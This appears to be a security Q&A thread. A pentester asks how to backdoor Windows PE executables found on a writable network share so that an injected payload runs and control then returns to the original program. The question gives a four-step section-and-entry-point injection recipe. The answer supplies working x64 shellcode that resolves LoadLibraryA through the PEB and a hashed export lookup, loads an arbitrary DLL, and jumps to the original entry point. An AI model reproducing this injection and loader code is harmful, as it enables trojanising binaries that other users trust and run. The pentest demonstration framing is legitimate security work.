# backdooring PE static file

Tags: malware

During a pentest, I have found a network share with plenty of binaries (.exe) available with RW rights. The purpose of this share is to make available for users generic tools. However, any authenticated user can edit them and add payload in it. I want to provide a demonstration to show the feasibility of this.

Basically, what i achieved so far boils down to:

```
1: create a new section in the sections table,
2: add empty bytes at the end of the file, at address and size according to those in the new section definition,
3: put a shellcode at the first byte of the empty section added,
4: change EntryPoint to point to this first byte of the shellcode.
```

When I execute this, my payload gets launched.

Now, I would like to redirect the execution flow to the former EntryPoint, to execute the real program. I have thought a simple `jmp` to the original EntryPoint would be enough. In fact, my shellcode does execute, but blocks the execution of the process (which is in fact totally normal).

I have thought launching my shellcode in a separate thread. I need for this to reach the address of functions such as createThread. I have really no idea on how to do this.

Furthermore, when I quit my meterpreter session, the shellcode should execute the last `jmp` instruction to reach the original `.text` section. Instead, it just terminates.

My knowledge on ASM and shellcodeprogramming is kinda low :/ I would really appreciate having a few pointers on doc I may have missed the perform this demo. Furtivity will not be a concern as the demo computer won't have any AV. Many thanks for helping!

Comment: Sounds like a lot of work, is there any reason you cant just make a reverse_tcp payload and then attach it to one of the available PEs via shellter or something? Then replace the original PE with your evil one?

Comment: I am really eager to understand how this is working under the woods; not only adding some payload in a given .exe file, which i know to be possible (didn't know about shellter, which sounds nice, but already tried with TheBackDoorFactory). Many thanks anyway for your comment!

Comment: Ok,I thought you were showing the implications of the vulnerability in a demonstration. If you want to learn shellcoding I'm afraid its hard for us to help you, as we would need to see exactly which PE you are looking at, what the addresses are, how you are adding to or changing the original. We have no idea what your PE looks like internally. Or what shellcode you are trying to use. You tried to detail your question, I see that, but not with information that can help us. Where exactly are you running into a problem, can you post a screenshot of the debugger at that point? etc...

Answer (score 2):

In order to do pretty much anything apart from crash the executable your shellcode will requires the use of the Windows API (CreateThread, LoadLibraryA etc).
This can be achieved by implementing a custom GetProcAddress function.

To return execution to the OEP (original entry point) you can use CreateThread, or "jmp" to the address. In order for the shellcode to have access to this address it needs to be hard coded into the code body.

The first instruction in the shellcode below moves 00000000 to r15. Your pe infection code needs to overwrite the first 6 bytes of the shellcode with:

```
mov r15d, [entry_point]
```

Where [entry_point] is the OEP RVA.

I wrote <strike>an entire answer (it got deleted)</strike> some shellcode for you:

```
mov r15d, 00000000h        ;this is 0x41BF00000000

;align stack
and rsp, 0FFFFFFFFFFFFFFF0h

;code to get the base address of ntdll.dll
mov r8, gs:[60h]                ;PEB
mov r8, [r8+18h]                ;PEB->Ldr (_PEB_LDR_DATA)
lea r8, [r8+10h]                ;_PEB_LDR_DATA->InLoadOrderModuleList (LDR_DATA_TABLE_ENTRY)
mov r8, [r8]                    ;_LIST_ENTRY->Flink (_LIST_ENTRY)
mov r8, [r8]                    ;_LIST_ENTRY->Flink (_LIST_ENTRY)
mov r8, [r8]                    ;_LIST_ENTRY->Flink (_LIST_ENTRY)

;save the base address (kernel32)
mov r12, [r8+30h]

;setup loop
mov r8d, dword ptr[r12+3ch]     ;IMAGE_DOS_HEADER->e_lfanew (DWORD) (Offset to IMAGE_NT_HEADERS64)
lea r8, qword ptr[r8+r12+88h]   ;add DllBase to the e_lfanew offset + 88h
                                ;18h - IMAGE_NT_HEADERS64->OptionalHeader (IMAGE_OPTIONAL_HEADER64) 18h bytes
                                ;70h - skip entire IMAGE_OPTIONAL_HEADER64 structure
mov r8d, dword ptr[r8]
add r8, r12

mov r9d, dword ptr[r8d+18h]     ;IMAGE_EXPORT_DIRECTORY->NumberOfNames (DWORD)s

fl:                             ;function loop
    dec r9                      ;start at end of array
    mov r10d, dword ptr[r8+20h] ;IMAGE_EXPORT_DIRECTORY->AddressOfNames (DWORD)
    add r10, r12                ;add dll base
    lea rcx, [r10+4*r9]         ;AddressOfNames[i] - function string RVA (relative virtual address)
    mov ecx, [rcx]
    add rcx, r12                ;add dll base

    ;hash the funtion name

    mov rax, 5381d
    hl:                         ;hash loop
        mov rbx, rax
        shl rax, 5
        add rax, rbx
        xor al, [rcx]
        inc rcx
        ;check for null termination
        cmp byte ptr[rcx], 00h
    jne hl
    ;hash complete
    mov rbx, 00b9a3b50901ed9addh ;LoadLibraryA
    cmp rax, rbx
jne fl

xor rax, rax                    ;make this more efficient (lol not gonna happen)
mov r10d, dword ptr[r8+24h]     ;IMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals (DWORD)
add r10, r12                    ;you know this by know right?
mov ax, word ptr[r10+2*r9]      ;AddressOfNameOrdinals[2*r9] - (2*r9 = 2 bytes * function name counter) + AddressOfNameOrdinals (WORD)

mov r10d, dword ptr[r8+1ch]
add r10, r12
mov eax, dword ptr[r10+rax*4]   ;AddressOfFunctions[4*r9] - (4*r9 = 4 bytes * function ordinal) + AddressOfFunctions (DWORD)
add rax, r12

lea rcx, [dll_name]
sub rsp, 20h
call rax
add rsp, 20h

;jump to the OEP
jmp r15

dll_name db "dingbong.dll", 0
```

Breakdown:

1. The shellcode accesses the gs register to retrieve a pointer the Process Environment Block (PEB)
2. The PEB is used to find the base address of kernel32.dll
3. Each exported function name from kernel32.dll is hashed and compared against a pre-hashed "LoadLibraryA".
4. The address of the LoadLibraryA function is retrieved by parsing the export table
5. "dingbong.dll" is loaded by the infected process

Helpful links:

https://win32assembly.programminghorizon.com/pe-tut7.html - export table

http://docdro.id/975yoLC - pe format